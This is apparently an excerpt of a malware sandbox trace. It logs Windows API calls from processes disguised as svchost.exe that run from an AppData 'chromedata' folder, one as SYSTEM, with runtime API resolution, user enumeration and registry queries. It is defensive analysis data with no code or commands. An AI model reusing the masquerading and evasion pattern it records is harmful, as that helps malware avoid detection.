	[0153.888] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.890] GetProcAddress (hModule=0x76f80000, lpProcName="free") returned 0x76f89894
	[0153.890] ResetEvent (hEvent=0x8) returned 1
	[0153.890] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.892] GetProcAddress (hModule=0x76f80000, lpProcName="malloc") returned 0x76f89cee
	[0153.892] ResetEvent (hEvent=0x8) returned 1
	[0153.892] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.895] GetProcAddress (hModule=0x76f80000, lpProcName="_XcptFilter") returned 0x76fadc75
	[0153.895] ResetEvent (hEvent=0x8) returned 1
	[0153.895] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.898] GetProcAddress (hModule=0x76f80000, lpProcName="??1type_info@@UAE@XZ") returned 0x76fd92b3
	[0153.898] ResetEvent (hEvent=0x8) returned 1
	[0153.898] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.900] GetProcAddress (hModule=0x76f80000, lpProcName="_vsnwprintf") returned 0x76f8bbce
	[0153.900] ResetEvent (hEvent=0x8) returned 1
	[0153.900] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.902] GetProcAddress (hModule=0x76f80000, lpProcName="??3@YAXPAX@Z") returned 0x76f8b0b9
	[0153.902] ResetEvent (hEvent=0x8) returned 1
	[0153.902] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.905] LoadLibraryW (lpLibFileName="SHLWAPI.dll") returned 0x771d0000
	[0153.906] ResetEvent (hEvent=0x8) returned 1
	[0153.906] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.908] GetProcAddress (hModule=0x771d0000, lpProcName="StrFormatByteSizeW") returned 0x7720169d
	[0153.908] ResetEvent (hEvent=0x8) returned 1
	[0153.908] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.911] LoadLibraryW (lpLibFileName="NETAPI32.dll") returned 0x73c20000
	[0153.927] ResetEvent (hEvent=0x8) returned 1
	[0153.927] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.929] GetProcAddress (hModule=0x73c20000, lpProcName="NetUserEnum") returned 0x735c59cf
	[0153.930] ResetEvent (hEvent=0x8) returned 1
	[0153.930] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.933] GetProcAddress (hModule=0x73c20000, lpProcName="NetApiBufferFree") returned 0x73c113d2
	[0153.933] ResetEvent (hEvent=0x8) returned 1
	[0153.933] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.936] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0x20fb68 | out: lpSystemTimeAsFileTime=0x20fb68*(dwLowDateTime=0x4586a200, dwHighDateTime=0x1d50a6a)) 
	[0153.936] GetCurrentProcessId () returned 0x4d8
	[0153.936] GetCurrentThreadId () returned 0x9e8
	[0153.936] GetTickCount () returned 0xa7dd95
	[0153.936] QueryPerformanceCounter (in: lpPerformanceCount=0x20fb60 | out: lpPerformanceCount=0x20fb60*=22777403885) returned 1
	[0153.936] malloc (_Size=0x80) returned 0x132458
	[0153.936] GetModuleHandleA (lpModuleName=0x0) returned 0x600000
	[0153.936] ResetEvent (hEvent=0x8) returned 1
	[0153.936] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.939] ??2@YAPAXI@Z () returned 0x1312b0
	[0153.939] ??2@YAPAXI@Z () returned 0x1312c0
	[0153.939] GetModuleHandleA (lpModuleName="Advapi32") returned 0x774c0000
	[0153.939] GetProcAddress (hModule=0x774c0000, lpProcName="RegGetValueW") returned 0x774d0e47
	[0153.939] ??3@YAXPAX@Z () returned 0x1
	[0153.939] ResetEvent (hEvent=0x8) returned 1
	[0153.939] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.943] free (_Block=0x132458) 
	[0153.943] ResetEvent (hEvent=0x8) returned 1
	[0153.943] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0153.944] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0x0, bAlertable=0) returned 0x102
	[0153.944] CloseHandle (hObject=0x8) returned 1
	[0153.944] CloseHandle (hObject=0x4) returned 1
	[0153.944] ExitProcess (uExitCode=0x0) 

Process:
	id = "34"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee176e0"
	os_pid = "0xa60"
	os_integrity_level = "0x2000"
	os_privileges = "0x800000"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "ZGW5TDPU\\2XC7u663GxWc"
	bitness = "64"
	os_groups = "ZGW5TDPU\\Domain Users" [0x7], "Everyone" [0x7], "BUILTIN\\Administrators" [0x10], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Logon Session 00000000:0000ece3" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7]


Thread:
	id = 164
	os_tid = 0xa94

	[0154.991] ResetEvent (hEvent=0x8) returned 1
	[0154.991] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0154.991] ResetEvent (hEvent=0x8) returned 1
	[0154.991] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0154.998] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0154.998] ResetEvent (hEvent=0x8) returned 1
	[0154.998] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.001] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleW") returned 0x76b6374d
	[0155.001] ResetEvent (hEvent=0x8) returned 1
	[0155.001] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.003] GetProcAddress (hModule=0x76b10000, lpProcName="GetVersionExW") returned 0x76b53b1a
	[0155.003] ResetEvent (hEvent=0x8) returned 1
	[0155.003] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.005] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcAddress") returned 0x76b633d3
	[0155.005] ResetEvent (hEvent=0x8) returned 1
	[0155.005] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.007] GetProcAddress (hModule=0x76b10000, lpProcName="WideCharToMultiByte") returned 0x76b6450e
	[0155.008] ResetEvent (hEvent=0x8) returned 1
	[0155.008] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.010] GetProcAddress (hModule=0x76b10000, lpProcName="HeapFree") returned 0x76b5bbd0
	[0155.010] ResetEvent (hEvent=0x8) returned 1
	[0155.010] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.012] GetProcAddress (hModule=0x76b10000, lpProcName="GetProcessHeap") returned 0x76b61280
	[0155.012] ResetEvent (hEvent=0x8) returned 1
	[0155.012] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.014] GetProcAddress (hModule=0x76b10000, lpProcName="HeapReAlloc") returned 0x7739ff51
	[0155.014] ResetEvent (hEvent=0x8) returned 1
	[0155.014] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.016] GetProcAddress (hModule=0x76b10000, lpProcName="HeapAlloc") returned 0x77382dd6
	[0155.016] ResetEvent (hEvent=0x8) returned 1
	[0155.016] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.019] GetProcAddress (hModule=0x76b10000, lpProcName="lstrlenW") returned 0x76b5d9e8
	[0155.019] ResetEvent (hEvent=0x8) returned 1
	[0155.019] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.021] GetProcAddress (hModule=0x76b10000, lpProcName="GetModuleHandleA") returned 0x76b5cf41
	[0155.021] ResetEvent (hEvent=0x8) returned 1
	[0155.021] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.023] GetProcAddress (hModule=0x76b10000, lpProcName="UnhandledExceptionFilter") returned 0x76b6ed38
	[0155.023] ResetEvent (hEvent=0x8) returned 1
	[0155.023] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.026] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcess") returned 0x76b5cdcf
	[0155.026] ResetEvent (hEvent=0x8) returned 1
	[0155.026] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.028] GetProcAddress (hModule=0x76b10000, lpProcName="TerminateProcess") returned 0x76b52331
	[0155.028] ResetEvent (hEvent=0x8) returned 1
	[0155.028] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.030] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTimeAsFileTime") returned 0x76b62fde
	[0155.030] ResetEvent (hEvent=0x8) returned 1
	[0155.030] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.032] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentProcessId") returned 0x76b5cac4
	[0155.032] ResetEvent (hEvent=0x8) returned 1
	[0155.032] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.035] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentThreadId") returned 0x76b5bb80
	[0155.035] ResetEvent (hEvent=0x8) returned 1
	[0155.035] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.037] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount") returned 0x76b5ba60
	[0155.037] ResetEvent (hEvent=0x8) returned 1
	[0155.037] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.039] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceCounter") returned 0x76b5bb9f
	[0155.039] ResetEvent (hEvent=0x8) returned 1
	[0155.040] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.042] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedCompareExchange") returned 0x76b5bb92
	[0155.042] ResetEvent (hEvent=0x8) returned 1
	[0155.042] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.044] GetProcAddress (hModule=0x76b10000, lpProcName="Sleep") returned 0x76b5ba46
	[0155.044] ResetEvent (hEvent=0x8) returned 1
	[0155.044] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.046] GetProcAddress (hModule=0x76b10000, lpProcName="InterlockedExchange") returned 0x76b5bf0a
	[0155.046] ResetEvent (hEvent=0x8) returned 1
	[0155.046] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.048] GetProcAddress (hModule=0x76b10000, lpProcName="SetUnhandledExceptionFilter") returned 0x76b63d01
	[0155.048] ResetEvent (hEvent=0x8) returned 1
	[0155.048] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.051] LoadLibraryW (lpLibFileName="ADVAPI32.dll") returned 0x774c0000
	[0155.052] ResetEvent (hEvent=0x8) returned 1
	[0155.052] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.054] GetProcAddress (hModule=0x774c0000, lpProcName="RegEnumKeyExW") returned 0x774d46c8
	[0155.054] ResetEvent (hEvent=0x8) returned 1
	[0155.054] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.057] GetProcAddress (hModule=0x774c0000, lpProcName="RegOpenKeyExW") returned 0x774d468d
	[0155.057] ResetEvent (hEvent=0x8) returned 1
	[0155.057] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.059] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryValueExW") returned 0x774d46ad
	[0155.059] ResetEvent (hEvent=0x8) returned 1
	[0155.059] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.061] GetProcAddress (hModule=0x774c0000, lpProcName="RegCloseKey") returned 0x774d469d
	[0155.061] ResetEvent (hEvent=0x8) returned 1
	[0155.061] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.063] GetProcAddress (hModule=0x774c0000, lpProcName="RegQueryInfoKeyW") returned 0x774d46e7
	[0155.063] ResetEvent (hEvent=0x8) returned 1
	[0155.063] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.066] LoadLibraryW (lpLibFileName="ole32.dll") returned 0x76cd0000
	[0155.084] ResetEvent (hEvent=0x8) returned 1
	[0155.084] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.087] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitializeSecurity") returned 0x76cf7259
	[0155.087] ResetEvent (hEvent=0x8) returned 1
	[0155.087] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.090] GetProcAddress (hModule=0x76cd0000, lpProcName="CoCreateInstance") returned 0x76d19d0b
	[0155.090] ResetEvent (hEvent=0x8) returned 1
	[0155.090] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.092] GetProcAddress (hModule=0x76cd0000, lpProcName="CoSetProxyBlanket") returned 0x76ce5ea5
	[0155.092] ResetEvent (hEvent=0x8) returned 1
	[0155.092] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.095] GetProcAddress (hModule=0x76cd0000, lpProcName="CoUninitialize") returned 0x76d186d3
	[0155.095] ResetEvent (hEvent=0x8) returned 1
	[0155.095] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.097] GetProcAddress (hModule=0x76cd0000, lpProcName="CoInitializeEx") returned 0x76d109ad
	[0155.097] ResetEvent (hEvent=0x8) returned 1
	[0155.097] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.100] LoadLibraryW (lpLibFileName="OLEAUT32.dll") returned 0x76a60000
	[0155.115] ResetEvent (hEvent=0x8) returned 1
	[0155.115] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.117] GetProcAddress (hModule=0x76a60000, lpProcName=0xc) returned 0x76a65dee
	[0155.117] ResetEvent (hEvent=0x8) returned 1
	[0155.117] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.119] GetProcAddress (hModule=0x76a60000, lpProcName=0x7) returned 0x76a64680
	[0155.119] ResetEvent (hEvent=0x8) returned 1
	[0155.119] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.120] GetProcAddress (hModule=0x76a60000, lpProcName=0x9) returned 0x76a63eae
	[0155.120] ResetEvent (hEvent=0x8) returned 1
	[0155.120] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.122] GetProcAddress (hModule=0x76a60000, lpProcName=0x2) returned 0x76a64642
	[0155.122] ResetEvent (hEvent=0x8) returned 1
	[0155.122] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.124] LoadLibraryW (lpLibFileName="msvcrt.dll") returned 0x76f80000
	[0155.125] ResetEvent (hEvent=0x8) returned 1
	[0155.125] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.127] GetProcAddress (hModule=0x76f80000, lpProcName="_except_handler4_common") returned 0x76fa3e27
	[0155.127] ResetEvent (hEvent=0x8) returned 1
	[0155.127] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.130] GetProcAddress (hModule=0x76f80000, lpProcName="??2@YAPAXI@Z") returned 0x76f8b0c9
	[0155.130] ResetEvent (hEvent=0x8) returned 1
	[0155.130] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.132] GetProcAddress (hModule=0x76f80000, lpProcName="_amsg_exit") returned 0x76feb2ef
	[0155.132] ResetEvent (hEvent=0x8) returned 1
	[0155.132] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.135] GetProcAddress (hModule=0x76f80000, lpProcName="_initterm") returned 0x76f8c151
	[0155.135] ResetEvent (hEvent=0x8) returned 1
	[0155.135] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.137] GetProcAddress (hModule=0x76f80000, lpProcName="free") returned 0x76f89894
	[0155.137] ResetEvent (hEvent=0x8) returned 1
	[0155.137] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.140] GetProcAddress (hModule=0x76f80000, lpProcName="malloc") returned 0x76f89cee
	[0155.140] ResetEvent (hEvent=0x8) returned 1
	[0155.140] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.142] GetProcAddress (hModule=0x76f80000, lpProcName="_XcptFilter") returned 0x76fadc75
	[0155.142] ResetEvent (hEvent=0x8) returned 1
	[0155.142] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.145] GetProcAddress (hModule=0x76f80000, lpProcName="??1type_info@@UAE@XZ") returned 0x76fd92b3
	[0155.145] ResetEvent (hEvent=0x8) returned 1
	[0155.145] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.147] GetProcAddress (hModule=0x76f80000, lpProcName="_vsnwprintf") returned 0x76f8bbce
	[0155.147] ResetEvent (hEvent=0x8) returned 1
	[0155.147] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.150] GetProcAddress (hModule=0x76f80000, lpProcName="??3@YAXPAX@Z") returned 0x76f8b0b9
	[0155.150] ResetEvent (hEvent=0x8) returned 1
	[0155.150] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.152] LoadLibraryW (lpLibFileName="SHLWAPI.dll") returned 0x771d0000
	[0155.153] ResetEvent (hEvent=0x8) returned 1
	[0155.153] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.156] GetProcAddress (hModule=0x771d0000, lpProcName="StrFormatByteSizeW") returned 0x7720169d
	[0155.156] ResetEvent (hEvent=0x8) returned 1
	[0155.156] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.158] LoadLibraryW (lpLibFileName="NETAPI32.dll") returned 0x73c20000
	[0155.163] ResetEvent (hEvent=0x8) returned 1
	[0155.163] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.165] GetProcAddress (hModule=0x73c20000, lpProcName="NetUserEnum") returned 0x735c59cf
	[0155.166] ResetEvent (hEvent=0x8) returned 1
	[0155.166] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.169] GetProcAddress (hModule=0x73c20000, lpProcName="NetApiBufferFree") returned 0x73c113d2
	[0155.169] ResetEvent (hEvent=0x8) returned 1
	[0155.169] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.172] GetSystemTimeAsFileTime (in: lpSystemTimeAsFileTime=0xffaa4 | out: lpSystemTimeAsFileTime=0xffaa4*(dwLowDateTime=0x4642aea0, dwHighDateTime=0x1d50a6a)) 
	[0155.172] GetCurrentProcessId () returned 0xa60
	[0155.172] GetCurrentThreadId () returned 0xa94
	[0155.172] GetTickCount () returned 0xa7e265
	[0155.172] QueryPerformanceCounter (in: lpPerformanceCount=0xffa9c | out: lpPerformanceCount=0xffa9c*=22901016553) returned 1
	[0155.172] malloc (_Size=0x80) returned 0x452458
	[0155.172] GetModuleHandleA (lpModuleName=0x0) returned 0x600000
	[0155.172] ResetEvent (hEvent=0x8) returned 1
	[0155.172] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.175] ??2@YAPAXI@Z () returned 0x4512b0
	[0155.175] ??2@YAPAXI@Z () returned 0x4512c0
	[0155.175] GetModuleHandleA (lpModuleName="Advapi32") returned 0x774c0000
	[0155.175] GetProcAddress (hModule=0x774c0000, lpProcName="RegGetValueW") returned 0x774d0e47
	[0155.175] ??3@YAXPAX@Z () returned 0x1
	[0155.175] ResetEvent (hEvent=0x8) returned 1
	[0155.175] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0155.177] free (_Block=0x452458) 
	[0155.177] ResetEvent (hEvent=0x8) returned 1
	[0155.177] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0

Process:
	id = "35"
	image_name = "svchost.exe"
	filename = "c:\\windows\\system32\\svchost.exe"
	page_root = "0x7ee172e0"
	os_pid = "0x110"
	os_integrity_level = "0x4000"
	os_privileges = "0xe60b1e890"
	monitor_reason = "child_process"
	parent_id = "24"
	os_parent_pid = "0x214"
	cmd_line = "svchost.exe"
	cur_dir = "C:\\Users\\2XC7u663GxWc\\AppData\\Roaming\\chromedata\\"
	os_username = "NT AUTHORITY\\SYSTEM"
	bitness = "64"
	os_groups = "Everyone" [0x7], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\SERVICE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT SERVICE\\BDESVC" [0xa], "NT SERVICE\\BITS" [0xa], "NT SERVICE\\CertPropSvc" [0xa], "NT SERVICE\\EapHost" [0xa], "NT SERVICE\\hkmsvc" [0xa], "NT SERVICE\\IKEEXT" [0xa], "NT SERVICE\\iphlpsvc" [0xe], "NT SERVICE\\LanmanServer" [0xe], "NT SERVICE\\MMCSS" [0xe], "NT SERVICE\\MSiSCSI" [0xa], "NT SERVICE\\RasAuto" [0xa], "NT SERVICE\\RasMan" [0xa], "NT SERVICE\\RemoteAccess" [0xa], "NT SERVICE\\Schedule" [0xe], "NT SERVICE\\SCPolicySvc" [0xa], "NT SERVICE\\SENS" [0xe], "NT SERVICE\\SessionEnv" [0xa], "NT SERVICE\\SharedAccess" [0xa], "NT SERVICE\\ShellHWDetection" [0xe], "NT SERVICE\\wercplsupport" [0xa], "NT SERVICE\\Winmgmt" [0xe], "NT SERVICE\\wuauserv" [0xe], "NT AUTHORITY\\Logon Session 00000000:0000af54" [0xc0000007], "LOCAL" [0x7], "BUILTIN\\Administrators" [0xe]


Thread:
	id = 165
	os_tid = 0x418

	[0187.615] ResetEvent (hEvent=0x8) returned 1
	[0187.615] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.649] LoadLibraryW (lpLibFileName="KERNEL32.dll") returned 0x76b10000
	[0187.649] ResetEvent (hEvent=0x8) returned 1
	[0187.649] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.652] GetProcAddress (hModule=0x76b10000, lpProcName="QueryPerformanceFrequency") returned 0x76b522a7
	[0187.652] ResetEvent (hEvent=0x8) returned 1
	[0187.652] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.654] GetProcAddress (hModule=0x76b10000, lpProcName="SetCurrentDirectoryA") returned 0x76b5903d
	[0187.654] ResetEvent (hEvent=0x8) returned 1
	[0187.654] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.656] GetProcAddress (hModule=0x76b10000, lpProcName="GetCurrentDirectoryA") returned 0x76b4733c
	[0187.656] ResetEvent (hEvent=0x8) returned 1
	[0187.656] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.659] GetProcAddress (hModule=0x76b10000, lpProcName="GetTickCount") returned 0x76b5ba60
	[0187.659] ResetEvent (hEvent=0x8) returned 1
	[0187.659] SignalObjectAndWait (hObjectToSignal=0x4, hObjectToWaitOn=0x8, dwMilliseconds=0xffffffff, bAlertable=0) returned 0x0
	[0187.661] GetProcAddress (hModule=0x76b10000, lpProcName="GetSystemTime") returned 0x76b5ced8
